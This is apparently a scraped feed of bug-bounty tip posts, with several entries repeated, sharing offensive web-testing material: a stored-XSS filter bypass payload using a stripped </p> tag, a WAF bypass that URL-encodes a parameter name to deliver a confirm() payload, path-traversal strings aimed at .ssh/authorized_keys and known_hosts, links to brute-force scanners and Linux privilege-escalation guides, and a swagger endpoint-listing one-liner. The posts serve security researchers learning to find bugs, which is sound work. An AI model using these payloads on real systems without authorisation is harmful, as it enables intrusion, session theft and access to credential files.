XSS filter bypass using stripped </p> tag to obfuscate.
P2 Stored XSS $1500 on a private bug bounty program.
XSS Payload:
<</p>iframe src=javascript:alert()//
#xss #bugbountytip #bugbountytips #bugbounty
P2 Stored XSS $1500 on a private bug bounty program.
XSS Payload:
<</p>iframe src=javascript:alert()//
#xss #bugbountytip #bugbountytips #bugbounty
XSS WAF Bypass Tip:
try url encoding the parameter name in your PoC URL!
?page=";confirm`1`//
Rightwards arrow
302
?pag%65=";confirm`1`//
Rightwards arrow
200 + XSS!
#bugbountytips
try url encoding the parameter name in your PoC URL!
?page=";confirm`1`//
Rightwards arrow
302
?pag%65=";confirm`1`//
Rightwards arrow
200 + XSS!
#bugbountytips
#bugbountytip #bugbounty Directory listing bypass payloads : Any file name or folder name ..%3B/
/%20../
/.ssh/authorized_keys
/.ssh/known_hosts
/%2e%2e/google.com
..%3B/////////////////////////////////
/%20../
/.ssh/authorized_keys
/.ssh/known_hosts
/%2e%2e/google.com
..%3B/////////////////////////////////
Some Automated Scanner
https://github.com/1N3/BruteX
https://github.com/1N3/BlackWidow
https://github.com/sa7mon/S3Scanner
https://github.com/MichaelStott/CRLF-Injection-Scanner
https://github.com/jaeles-project/jaeles
https://github.com/random-robbie/kube-scan
https://github.com/hash3liZer/Subrake
https://github.com/j3ssie/Osmedeus
https://github.com/sullo/nikto
#bugbounty,#bugbountytips
https://github.com/1N3/BruteX
https://github.com/1N3/BlackWidow
https://github.com/sa7mon/S3Scanner
https://github.com/MichaelStott/CRLF-Injection-Scanner
https://github.com/jaeles-project/jaeles
https://github.com/random-robbie/kube-scan
https://github.com/hash3liZer/Subrake
https://github.com/j3ssie/Osmedeus
https://github.com/sullo/nikto
#bugbounty,#bugbountytips
GitHub
GitHub - 1N3/BruteX: Automatically brute force all services running on a target.
Automatically brute force all services running on a target. - 1N3/BruteX
Linux For Pentester:tmux Privilege Escalation.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20For%20Pentester:%20tmux%20Privilege%20Escalation.pdf
Linux for Pentester:Perl Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2/Linux%20for%20Pentester:%20Perl%20Privilege%20Escalation.pdf
Linux for Pentester:ed Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20for%20Pentester:%20ed%20Privilege%20Escalation.pdf
#Pentesting #RedTeam #hacking #PenTest
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20For%20Pentester:%20tmux%20Privilege%20Escalation.pdf
Linux for Pentester:Perl Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2/Linux%20for%20Pentester:%20Perl%20Privilege%20Escalation.pdf
Linux for Pentester:ed Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20for%20Pentester:%20ed%20Privilege%20Escalation.pdf
#Pentesting #RedTeam #hacking #PenTest
GitHub
blaCCkHatHacEEkr/PENTESTING-BIBLE
This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .L...
Return a list of endpoints from a swagger.json.
Pass them to your fuzzer(s), +profit?
curl -s hxxps://petstore.swagger.io/v2/swagger.json | jq '.paths | keys[]'
#bugbounty #bugbountytips #redteam #security #oneliner #bash
Pass them to your fuzzer(s), +profit?
curl -s hxxps://petstore.swagger.io/v2/swagger.json | jq '.paths | keys[]'
#bugbounty #bugbountytips #redteam #security #oneliner #bash